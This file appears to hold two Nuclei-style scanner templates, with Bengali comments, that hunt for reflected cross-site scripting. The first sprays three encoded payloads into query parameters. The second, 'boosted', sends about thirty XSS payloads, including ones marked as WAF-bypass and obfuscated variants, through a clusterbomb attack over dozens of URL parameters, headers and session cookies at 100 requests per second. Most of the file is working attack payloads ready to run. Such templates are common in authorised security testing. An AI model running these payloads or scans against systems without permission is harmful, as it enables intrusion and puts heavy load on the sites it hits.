id: auto-equal-reflected-xss

info:
  name: Reflected XSS via Auto Parameter Injection
  author: Nahid
  severity: high
  description: |
    Automatically injects XSS payloads into all URL parameters
    by replacing everything after '=' with payloads.
  tags: xss,reflected,auto,params

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      payload:
        - "%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E"
        - "%26%2302java%26%23115cript:alert(document.domain)"
        - "javascript%0a:\\u0061lert(origin)"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{payload}}"

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=prompt(1)"
          - "alert(document.domain)"
          - "alert(origin)"

      - type: regex
        part: body
        regex:
          - "(?i)(<script|onerror=|javascript:)"

    stop-at-first-match: true




XSS+++



id: xss-multi-point-injection-boosted

info:
  name: XSS Multi-Point Injection (Boosted)
  author: bengali-hacker
  severity: high
  description: |
    Injects XSS payloads at multiple points (URL params, headers, cookies) 
    with 40+ parameter coverage for comprehensive testing.
  tags: xss,multi-injection,headers,cookies,comprehensive

requests:
  - method: GET
    path: "{{BaseURL}}"

    # চার জায়গায় ইনজেক্ট করবে: URL Parameters, Headers, Cookies, Path
    payloads:
      # =============== URL PARAMETERS ===============
      url_params:
        # আপনার দেওয়া ৪০+ প্যারামিটার
        - "q={{xss_payload}}"
        - "s={{xss_payload}}"
        - "search={{xss_payload}}"
        - "lang={{xss_payload}}"
        - "keyword={{xss_payload}}"
        - "query={{xss_payload}}"
        - "page={{xss_payload}}"
        - "keywords={{xss_payload}}"
        - "year={{xss_payload}}"
        - "view={{xss_payload}}"
        - "email={{xss_payload}}"
        - "type={{xss_payload}}"
        - "name={{xss_payload}}"
        - "p={{xss_payload}}"
        - "callback={{xss_payload}}"
        - "jsonp={{xss_payload}}"
        - "api_key={{xss_payload}}"
        - "api={{xss_payload}}"
        - "password={{xss_payload}}"
        - "emailto={{xss_payload}}"
        - "token={{xss_payload}}"
        - "username={{xss_payload}}"
        - "csrf_token={{xss_payload}}"
        - "unsubscribe_token={{xss_payload}}"
        - "id={{xss_payload}}"
        - "item={{xss_payload}}"
        - "page_id={{xss_payload}}"
        - "month={{xss_payload}}"
        - "immagine={{xss_payload}}"
        - "list_type={{xss_payload}}"
        - "url={{xss_payload}}"
        - "terms={{xss_payload}}"
        - "categoryid={{xss_payload}}"
        - "key={{xss_payload}}"
        - "l={{xss_payload}}"
        - "begindate={{xss_payload}}"
        - "enddate={{xss_payload}}"
        
        # অতিরিক্ত গুরুত্বপূর্ণ প্যারামিটার
        - "sort={{xss_payload}}"
        - "order={{xss_payload}}"
        - "filter={{xss_payload}}"
        - "limit={{xss_payload}}"
        - "offset={{xss_payload}}"
        - "format={{xss_payload}}"
        - "output={{xss_payload}}"
        - "data={{xss_payload}}"
        - "text={{xss_payload}}"
        - "content={{xss_payload}}"
        - "message={{xss_payload}}"
        - "comment={{xss_payload}}"
        - "feedback={{xss_payload}}"
        - "review={{xss_payload}}"
        - "rating={{xss_payload}}"
        - "vote={{xss_payload}}"
        - "like={{xss_payload}}"
        - "share={{xss_payload}}"
        - "admin={{xss_payload}}"
        - "user={{xss_payload}}"
        - "profile={{xss_payload}}"
        - "account={{xss_payload}}"
        - "settings={{xss_payload}}"
        - "config={{xss_payload}}"
        - "debug={{xss_payload}}"
        - "test={{xss_payload}}"
        - "dev={{xss_payload}}"
        - "mode={{xss_payload}}"
        - "action={{xss_payload}}"
        - "cmd={{xss_payload}}"
        - "do={{xss_payload}}"
        - "func={{xss_payload}}"
        - "op={{xss_payload}}"
        - "request={{xss_payload}}"
        - "param={{xss_payload}}"
        - "field={{xss_payload}}"
        - "file={{xss_payload}}"
        - "upload={{xss_payload}}"
        - "download={{xss_payload}}"
      
      # =============== HTTP HEADERS ===============
      header_values:
        # ইনজেকশন হেডার
        - "X-Forwarded-For: {{xss_payload}}"
        - "Referer: {{xss_payload}}"
        - "User-Agent: {{xss_payload}}"
        - "X-Original-URL: {{xss_payload}}"
        - "X-Real-IP: {{xss_payload}}"
        - "X-Client-IP: {{xss_payload}}"
        - "X-Remote-IP: {{xss_payload}}"
        - "X-Host: {{xss_payload}}"
        - "X-Forwarded-Host: {{xss_payload}}"
        - "X-Custom-Header: {{xss_payload}}"
        - "Origin: {{xss_payload}}"
        - "X-CSRF-Token: {{xss_payload}}"
        - "X-Api-Key: {{xss_payload}}"
        - "Authorization: Bearer {{xss_payload}}"
        - "X-Requested-With: {{xss_payload}}"
        - "X-HTTP-Method-Override: {{xss_payload}}"
      
      # =============== COOKIES ===============
      cookie_values:
        # সাধারণ cookies
        - "session={{xss_payload}}"
        - "token={{xss_payload}}"
        - "auth={{xss_payload}}"
        - "login={{xss_payload}}"
        - "user={{xss_payload}}"
        - "admin={{xss_payload}}"
        - "csrf={{xss_payload}}"
        - "id={{xss_payload}}"
        - "uid={{xss_payload}}"
        - "remember={{xss_payload}}"
        - "access_token={{xss_payload}}"
        - "refresh_token={{xss_payload}}"
        - "jwt={{xss_payload}}"
        - "oauth={{xss_payload}}"
        - "sso={{xss_payload}}"
        - "PHPSESSID={{xss_payload}}"
        - "JSESSIONID={{xss_payload}}"
        - "ASP.NET_SessionId={{xss_payload}}"
        - "laravel_session={{xss_payload}}"
        - "XSRF-TOKEN={{xss_payload}}"
      
      # =============== XSS PAYLOADS ===============
      xss_payload:
        # আপনার মূল তিনটি পেলোড
        - "javascript%0a:\\u0061lert(origin)"
        - "%26%2302java%26%23115cript:alert(document.domain)"
        - "%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E"
        
        # অতিরিক্ত পেলোড (বিভিন্ন টেকনিক)
        # 1. Basic payloads
        - "\"><script>alert(document.domain)</script>"
        - "javascript:alert`XSS`"
        - "'onfocus='alert(1)'autofocus='"
        - "<script>alert('XSS')</script>"
        - "javascript:alert('XSS')"
        
        # 2. Event handlers
        - "\" onmouseover=\"alert('XSS')\""
        - "' onload=\"alert('XSS')\""
        - " onerror=alert('XSS')"
        - " ontoggle=alert('XSS')"
        - " onfocus=alert('XSS') autofocus"
        
        # 3. HTML tags
        - "<img src=x onerror=alert(document.domain)>"
        - "<svg onload=alert(document.domain)>"
        - "<body onload=alert('XSS')>"
        - "<iframe src=javascript:alert('XSS')>"
        - "<input autofocus onfocus=alert('XSS')>"
        
        # 4. Encoded payloads
        - "%3Cscript%3Ealert(1)%3C/script%3E"
        - "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;"
        - "&lt;script&gt;alert(1)&lt;/script&gt;"
        
        # 5. WAF bypass
        - "<scr<script>ipt>alert(1)</scr</script>ipt>"
        - "<scri<!--test-->pt>alert(1)</scri<!--test-->pt>"
        - "<script>alert`1`</script>"
        - "<script>alert(1)</script>"
        
        # 6. DOM based
        - "javascript:eval('al'+'ert(1)')"
        - "javascript:window['al'+'ert'](1)"
        - "javascript:globalThis['al'+'ert'](1)"
        
        # 7. Template literals
        - "${alert(1)}"
        - "`${alert(1)}`"

    # Attack strategy: Clusterbomb - সব কম্বিনেশন টেস্ট করবে
    attack: clusterbomb
    threads: 15
    rate-limit: 100

    raw:
      - |
        GET {{path}}?{{url_params}} HTTP/1.1
        Host: {{Hostname}}
        {{header_values}}
        Cookie: {{cookie_values}}; test={{xss_payload}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1

    matchers-condition: and
    matchers:
      # 1. Basic matchers - পেলোড reflect হয়েছে কিনা
      - type: dsl
        dsl:
          - "contains(body, 'alert') || contains(body, 'prompt') || contains(body, 'javascript') || contains(body, '<script') || contains(body, 'onerror') || contains(body, 'onload') || contains(body, 'onmouseover') || contains(body, 'onfocus') || contains(body, 'ontoggle') || contains(body, '<img') || contains(body, '<svg') || contains(body, '<iframe') || contains(body, '<input') || contains(body, '<body')"
          
      # 2. Status code filter
      - type: status
        status:
          - 200
          - 302
          - 301
          - 400  # Bad request কিন্তু reflection হতে পারে
          - 500  # Server error কিন্তু reflection হতে পারে
          
      # 3. Length filter (very small/large responses ignore)
      - type: dsl
        dsl:
          - "raw_length > 50 && raw_length < 500000"
          
      # 4. Not a blocked page
      - type: dsl
        dsl:
          - "!contains(body_sha256, 'blocked_page_hash') && !contains(body, 'Access Denied') && !contains(body, 'Forbidden') && !contains(body, 'Security Violation')"

    # Extractors for detailed reporting
    extractors:
      - type: regex
        name: vulnerable_point
        part: all
        group: 1
        regex:
          # URL parameter
          - "GET [^ ]+\\?([^=]+)="
          # Header
          - "(X-[^:]+):"
          # Cookie
          - "Cookie: ([^=]+)="
        
      - type: regex
        name: reflected_payload
        part: body
        internal: true
        regex:
          - "(alert\\([^)]+\\))"
          - "(prompt\\([^)]+\\))"
          - "(<script>[^<]+</script>)"
        
      - type: kval
        name: injection_type
        part: all
        kval:
          - "url_param"
          - "header"
          - "cookie"